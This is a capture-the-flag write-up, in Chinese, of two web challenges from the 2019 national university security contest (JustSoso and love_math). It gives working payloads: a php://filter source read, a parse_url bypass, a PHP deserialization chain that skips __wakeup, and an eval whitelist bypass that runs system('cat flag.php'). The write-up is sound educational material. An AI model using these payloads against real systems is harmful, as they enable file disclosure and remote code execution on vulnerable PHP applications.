1. 程式人生 > >2019全國大學生信息安全競賽部分Web writeup

2019全國大學生信息安全競賽部分Web writeup

bin lse rand 數學 .com sch font 數學函數 attacked

JustSoso

0x01

審查元素發現了提示,偽協議拿源碼

/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

 1 <?php
 2 error_reporting(0);
 3 $file = $_GET["file"];
 4 $payload = $_GET["payload"];
 5 if (!isset($file)) {
 6     echo ‘Missing parameter‘ . ‘<br>‘;
 7 }
 8 if (preg_match("/flag/", $file
)) { 9 die(‘hack attacked!!!‘); 10 } 11 @include ($file); 12 if (isset($payload)) { 13 $url = parse_url($_SERVER[‘REQUEST_URI‘]); 14 parse_str($url[‘query‘], $query); 15 foreach ($query as $value) { 16 if (preg_match("/flag/", $value)) { 17 die(‘stop hacking!‘); 18 exit
(); 19 } 20 } 21 $payload = unserialize($payload); 22 } else { 23 echo "Missing parameters"; 24 } ?>

/index.php?file=php://filter/read=convert.base64-encode/resource=hint.php

 1 <?php  
 2 class Handle{ 
 3     private $handle;  
 4     public function __wakeup(){
 5   foreach(get_object_vars
($this) as $k => $v) { 6 $this->$k = null; 7 } 8 echo "Waking up\n"; 9 } 10 public function __construct($handle) { 11 $this->handle = $handle; 12 } 13 public function __destruct(){ 14 $this->handle->getFlag(); 15 } 16 } 17 18 class Flag{ 19 public $file; 20 public $token; 21 public $token_flag; 22 23 function __construct($file){ 24 $this->file = $file; 25 $this->token_flag = $this->token = md5(rand(1,10000)); 26 } 27 28 public function getFlag(){ 29 $this->token_flag = md5(rand(1,10000)); 30 if($this->token === $this->token_flag) 31 { 32 if(isset($this->file)){ 33 echo @highlight_file($this->file,true); 34 } 35 } 36 } 37 } 38 ?>
0x02 通過查看parse_url()函數的官方文檔得知: 這個函數是專門用於解析url而不是uri的。但是,為了符合PHP的向後兼容性要求,它對file://scheme做了一個例外,其中允許使用三斜杠(file:///…),對於任何其他方案,這都是無效的。 因此通過///index.php繞過parse_url()函數限制 0x03 構造反序列化 技術分享圖片

$handle由private修飾,所以要在前面加上%00

O:6:"Handle":1:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";N;s:10:"token_flag";R:4;}}

_wakeup()繞過

反序列化時,如果表示對象屬性個數的值大於真實的屬性個數時就會跳過_wakeup()的執行

O:6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";N;s:10:"token_flag";R:4;}}

最終payload為:

///index.php?file=hint.php&payload=O:6:%22Handle%22:2:{s:14:%22%00Handle%00handle%22;O:4:%22Flag%22:3:{s:4:%22file%22;s:8:%22flag.php%22;s:5:%22token%22;N;s:10:%22token_flag%22;R:4;}}


love_math

審查元素,在js代碼中發現calc,php,訪問得到源碼

技術分享圖片

 1 <?php 
 2 error_reporting(0); 
 3 //聽說你很喜歡數學,不知道你是否愛它勝過愛flag 
 4 if(!isset($_GET[‘c‘])){ 
 5     show_source(__FILE__); 
 6 }else{ 
 7     //例子 c=20-1 
 8     $content = $_GET[‘c‘]; 
 9     if (strlen($content) >= 80) { 
10         die("太長了不會算"); 
11     } 
12     $blacklist = [‘ ‘, ‘\t‘, ‘\r‘, ‘\n‘,‘\‘‘, ‘"‘, ‘`‘, ‘\[‘, ‘\]‘]; 
13     foreach ($blacklist as $blackitem) { 
14         if (preg_match(‘/‘ . $blackitem . ‘/m‘, $content)) { 
15             die("請不要輸入奇奇怪怪的字符"); 
16         } 
17     } 
18     //常用數學函數http://www.w3school.com.cn/php/php_ref_math.asp 
19     $whitelist = [‘abs‘, ‘acos‘, ‘acosh‘, ‘asin‘, ‘asinh‘, ‘atan2‘, ‘atan‘, ‘atanh‘, ‘base_convert‘, ‘bindec‘, ‘ceil‘, ‘cos‘, ‘cosh‘, ‘decbin‘, ‘dechex‘, ‘decoct‘, ‘deg2rad‘, ‘exp‘, ‘expm1‘, ‘floor‘, ‘fmod‘, ‘getrandmax‘, ‘hexdec‘, ‘hypot‘, ‘is_finite‘, ‘is_infinite‘, ‘is_nan‘, ‘lcg_value‘, ‘log10‘, ‘log1p‘, ‘log‘, ‘max‘, ‘min‘, ‘mt_getrandmax‘, ‘mt_rand‘, ‘mt_srand‘, ‘octdec‘, ‘pi‘, ‘pow‘, ‘rad2deg‘, ‘rand‘, ‘round‘, ‘sin‘, ‘sinh‘, ‘sqrt‘, ‘srand‘, ‘tan‘, ‘tanh‘]; 
20     preg_match_all(‘/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/‘, $content, $used_funcs); 
21     foreach ($used_funcs[0] as $func) { 
22         if (!in_array($func, $whitelist)) { 
23             die("請不要輸入奇奇怪怪的函數"); 
24         } 
25     } 
26     //幫你算出答案 
27     eval(‘echo ‘.$content.‘;‘); 
28 } 

0x02

經過分析:

有長度限制,不能超過80

雖然有/m,但是\r在黑名單中,所以不存在換行繞過

傳給c的參數不能是字母,只允許使用白名單的函數作字符串

要用白名單中的函數將數字轉成字母,發現base_convert()和dechex()兩個函數

0x03

最終payload:

c=$pow%3Dbase_convert(37907361743,10,36)(dechex(1598506324));($$pow){0}(($$pow){1})&0=system&1=cat%20flag.php

解釋如下:

dechex(1598506324)得到的是_GET進行hex編碼的值

base_convert(37907361743,10,36)得到的是函數hex2bin

c的值定義了$pow=_GET,那麽$$pow=$_GET

最後執行的代碼為$_GET{system}($_GET{cat flag.php})

2019全國大學生信息安全競賽部分Web writeup